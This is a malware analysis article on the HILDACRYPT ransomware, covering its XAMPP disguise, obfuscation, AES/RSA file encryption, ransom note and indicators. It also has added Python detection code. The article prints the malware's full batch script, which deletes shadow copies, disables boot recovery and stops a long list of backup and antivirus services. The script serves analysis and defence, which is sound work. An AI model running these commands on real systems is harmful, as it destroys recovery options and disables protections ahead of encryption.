HILDACRYPT: New ransomware hits backup systems and antivirus solutions

Hello, Habr! Once again we are talking about the latest version of malware from the Ransomware category. HILDACRYPT is a new ransomware from the Hilda family, discovered in August 2019 and named after the Netflix cartoon that was used to distribute the program. Today we look at the technical features of this updated ransomware.


In the first version of the Hilda ransomware, the ransom note contained a link to the YouTube trailer of the animated series. HILDACRYPT poses as a legitimate installer of XAMPP, an easy-to-install Apache distribution that includes MariaDB, PHP, and Perl. At the same time, the cryptolocker has a slightly different file name: xamp. In addition, the ransomware file has no digital signature.

Static Analysis

The ransomware is contained in a PE32 .NET file built for MS Windows. Its size is 135,168 bytes. Both the main program code and the defender program code are written in C#. According to the compilation timestamp, the binary was created on September 14.


According to Detect It Easy, the ransomware is packed with Confuser and ConfuserEx, but these obfuscators are essentially the same: ConfuserEx is simply the successor of Confuser, so their signatures are similar.


HILDACRYPT is indeed packed with ConfuserEx.


SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Attack vector

Apparently, the ransomware was hosted on one of the web development sites, posing as a legitimate XAMPP program.

The full infection chain can be viewed in the app.any.run sandbox.

Obfuscation

The ransomware's strings are stored in encrypted form. At runtime, HILDACRYPT decrypts them using Base64 and AES-256-CBC.


Launch

First, the ransomware creates a folder in %AppData\Roaming% whose name is a randomly generated GUID (Globally Unique Identifier). After dropping a .bat file into this location, the ransomware launches it using cmd.exe:

cmd.exe /c JKfgkgj3hjgfhjka.bat & exit

Then it starts executing the batch script to stop processes and services.


The script contains a long list of commands that delete shadow copies and stop SQL Server, backup, and antivirus solutions.

For example, it tries to stop the Acronis Backup service. In addition, it targets backup systems and antivirus solutions from the following vendors: Veeam, Sophos, Kaspersky, McAfee and others.

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
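The script above leaves a recognisable trail in process-creation telemetry: shadow storage resized and then deleted, boot recovery disabled, and a burst of net stop calls against backup and antivirus services. The following Python is an added detection example, not code from the article or from the malware; the command lines and rule weights are constructed for this example.

```python
import re
from collections import Counter
# Constructed process-creation command lines (what Sysmon event 1 / Windows 4688
# would record), modelled on the batch script above. Not real telemetry.
SAMPLE_CMDLINES = [
    'vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB',
    'vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded',
    'bcdedit /set {default} recoveryenabled No',
    'bcdedit /set {default} bootstatuspolicy ignoreallfailures',
    'vssadmin Delete Shadows /all /quiet',
    'net stop "Sophos AutoUpdate Service" /y',
    'net stop VeeamBackupSvc /y',
    'net stop AcrSch2Svc /y',
    'net stop MSSQLSERVER /y',
    'net stop klnagent /y',
    r'notepad.exe C:\Users\user\notes.txt',  # benign noise
]
# (rule name, pattern, weight); the weights are this example's own assumption.
RULES = [
    ("shadow_storage_resize", r'^vssadmin\s+resize\s+shadowstorage\b', 2),
    ("shadow_copy_delete", r'^vssadmin\s+delete\s+shadows\b', 5),
    ("recovery_disabled", r'^bcdedit\s+/set\s+\{default\}\s+recoveryenabled\s+no\b', 4),
    ("boot_failures_ignored", r'^bcdedit\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures', 3),
    # Service-name prefixes seen in the script: Acronis, Veeam, Sophos, Kaspersky, McAfee, SQL Server
    ("backup_av_service_stop",
     r'^net\s+stop\s+["“]?(acr|acronis|veeam|sophos|sav|kav|klnagent|avp|mc|mfe|mssql|sql)', 1),
]
COMPILED = [(name, re.compile(rx, re.I), w) for name, rx, w in RULES]

def classify(cmdline):
    """Names of the rules a single command line triggers."""
    return [name for name, rx, _ in COMPILED if rx.search(cmdline.strip())]

def score_session(cmdlines, mass_stop_threshold=5):
    """Score one host's command lines. Returns (score, Counter of rule hits)."""
    hits = Counter()
    for line in cmdlines:
        hits.update(classify(line))
    score = sum(w * hits[name] for name, _, w in COMPILED)
    # A burst of 'net stop' calls is suspicious on its own, whatever the names.
    stops = sum(1 for line in cmdlines if re.match(r'\s*net\s+stop\b', line, re.I))
    if stops >= mass_stop_threshold:
        hits["mass_service_stop"] = stops
        score += 5
    return score, hits

def is_ransomware_prep(cmdlines, threshold=10):
    """True when the session looks like HILDACRYPT-style pre-encryption tampering."""
    return score_session(cmdlines)[0] >= threshold
```

Feeding a real EDR export through score_session per host and time window gives a ranked list; the single recoveryenabled/Delete Shadows lines are worth alerting on even without the service-stop burst.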

After the services and processes listed above are stopped, the cryptolocker collects information about all running processes using the tasklist command to make sure all the necessary services have been stopped.
tasklist /v /fo csv

The command displays a detailed list of running processes, with fields separated by the "," character.
"csrss.exe","448","services","0","1 896 КБ","unknown","Н/Д","0:00:03","Н/Д"


After this check, the ransomware begins encryption.

Encryption

File encryption

HILDACRYPT walks through all available folders on the hard drive, except the Recycle.Bin and Reference Assemblies\Microsoft folders. The latter contains critical dll, pdb, etc. files of .Net programs that could affect the ransomware itself. The following list of extensions is used to select files for encryption:

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

The ransomware uses the AES-256-CBC algorithm to encrypt user files. The key size is 256 bits and the initialization vector (IV) size is 16 bytes.


In the following screenshots, the values of byte_2 and byte_1 were obtained randomly using GetBytes().

Key

IV

The encrypted file gets the HCY! extension. This is an example of an encrypted file. The key and IV shown above were generated for this file.


Key encryption

The cryptolocker stores the generated AES key inside the encrypted file. The first part of the encrypted file is a header containing fields such as HILDACRYPT, KEY, IV and FileLen in XML format, and looks like this:


The AES key and IV are encrypted with RSA-2048 and encoded with Base64. The RSA public key is stored in the body of the cryptolocker in one of the encrypted strings, in XML format.

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

The RSA public key is used to encrypt the per-file AES key. The RSA public key is Base64 encoded and consists of the modulus and the public exponent 65537. Decryption requires the RSA private key, which only the attacker has.

After RSA encryption, the AES key is Base64 encoded and stored in the encrypted file.
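To check the parameters the article reads off the embedded key (a 2048-bit modulus, exponent AQAB = 65537, Base64 inside XML), here is an added Python helper; it is not code from the article or from the malware. It assumes the key uses the .NET RSAKeyValue XML layout that RSA.ToXmlString produces, and the modulus in the sample is a constructed placeholder, not the key from this sample.

```python
import base64
import hashlib
import xml.etree.ElementTree as ET

# Constructed sample in the .NET RSAKeyValue layout. The modulus is a placeholder:
# 256 bytes with the top bit set, so it parses as 2048-bit, but it is not a valid
# RSA modulus and not the key embedded in the real sample.
_FAKE_MODULUS = bytes([0xC3]) + bytes(range(1, 256))
SAMPLE_KEY_XML = (
    "<RSAKeyValue><Modulus>" + base64.b64encode(_FAKE_MODULUS).decode()
    + "</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
)

def parse_rsa_key_xml(xml_text):
    """Return (modulus, exponent, has_private) from an RSAKeyValue XML string."""
    root = ET.fromstring(xml_text)
    if root.tag != "RSAKeyValue":
        raise ValueError("not an RSAKeyValue document")
    def field(name):
        text = root.findtext(name)
        if text is None:
            raise ValueError(f"missing <{name}>")
        return int.from_bytes(base64.b64decode(text), "big")
    n, e = field("Modulus"), field("Exponent")
    # Private components (D, P, Q, ...) are absent from the key embedded in the
    # ransomware; their absence is why the victim cannot decrypt locally.
    has_private = root.find("D") is not None
    return n, e, has_private

def describe_key(xml_text):
    """Summarise a key the way an analyst would record it for a report."""
    n, e, has_private = parse_rsa_key_xml(xml_text)
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return {
        "bits": n.bit_length(),
        "exponent": e,
        "has_private": has_private,
        # SHA-256 of the big-endian modulus: a stable id for correlating samples
        "modulus_sha256": hashlib.sha256(raw).hexdigest(),
    }
```

The modulus fingerprint is the useful output: two samples sharing it were built by the same operator even if the binaries, packers and ransom notes differ.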

Ransom note

At the end of encryption, HILDACRYPT writes an html file to the folder in which it encrypted files. The ransom note contains two email addresses that the victim can use to contact the attacker.


The ransom note also contains the line "No loli is safe;)", a reference to anime and manga characters with the appearance of little girls, which are banned in Japan.

Conclusion

HILDACRYPT, a new ransomware family, has released a new version. The encryption model prevents the victim from decrypting files encrypted by the ransomware. The cryptolocker uses active defense methods to disable protective services belonging to backup systems and antivirus solutions. The author of HILDACRYPT is a fan of the Netflix animated series Hilda, whose trailer was included in the ransom note of the previous version of the program.

As usual, Acronis Backup and Acronis True Image can protect your computer from the HILDACRYPT ransomware, and service providers can protect their customers with Acronis Backup Cloud. Protection is ensured by the fact that these solutions include cyber protection that goes beyond backups, including our built-in Acronis Active Protection, a behavior-based machine learning technology that can counter zero-day ransomware threats as they appear.

Indicators of compromise

File extension HCY!
HILDACRYPTreadMe.html
xamp.exe with a single "p" and no digital signature
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Source: www.habr.com
